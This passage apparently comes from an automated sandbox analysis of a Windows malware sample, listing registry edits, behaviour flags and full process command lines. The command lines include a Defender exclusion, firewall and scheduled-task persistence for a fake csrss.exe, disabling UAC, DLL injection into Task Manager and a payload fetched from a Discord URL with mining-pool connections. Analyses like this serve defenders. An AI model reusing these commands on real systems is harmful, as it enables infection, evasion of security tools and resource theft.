| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2372 = "Easter Island Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" | C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" | C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u318.1.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | N/A |
Uses Task Scheduler COM API
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | "C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe" -Force |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" |
| C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe | "C:\Users\Admin\Pictures\fKZRHEfYlQuPD6l3AskVdPrk.exe" |
| C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | "C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe" |
| C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | "C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe" |
| C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | "C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe" |
| C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | "C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe" |
| C:\Users\Admin\AppData\Local\Temp\u318.0.exe | "C:\Users\Admin\AppData\Local\Temp\u318.0.exe" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Users\Admin\AppData\Local\Temp\u318.1.exe | "C:\Users\Admin\AppData\Local\Temp\u318.1.exe" |
| C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe | "C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe" |
| C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe | "C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe" |
| C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe | "C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe" |
| C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe | "C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Windows\System32\cmd.exe | C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes" |
| C:\Windows\system32\netsh.exe | netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes |
| C:\Windows\System32\cmd.exe | C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes" |
| C:\Windows\system32\netsh.exe | netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes |
| C:\Windows\System32\cmd.exe | C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Windows\system32\netsh.exe | netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes |
| C:\Windows\System32\cmd.exe | C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes" |
| C:\Windows\system32\netsh.exe | netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe | "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1 |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Windows\rss\csrss.exe | C:\Windows\rss\csrss.exe |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Windows\SYSTEM32\schtasks.exe | schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F |
| C:\Windows\SYSTEM32\schtasks.exe | schtasks /delete /tn ScheduledUpdate /f |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll |
| C:\Windows\SYSTEM32\schtasks.exe | schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F |
| C:\Windows\windefender.exe | "C:\Windows\windefender.exe" |
| C:\Windows\SysWOW64\cmd.exe | cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) |
| C:\Windows\SysWOW64\sc.exe | sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) |
| C:\Windows\windefender.exe | C:\Windows\windefender.exe |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1180 |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe | C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80 |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe | C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -nologo -noprofile |
| C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe | C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe |
Network
Files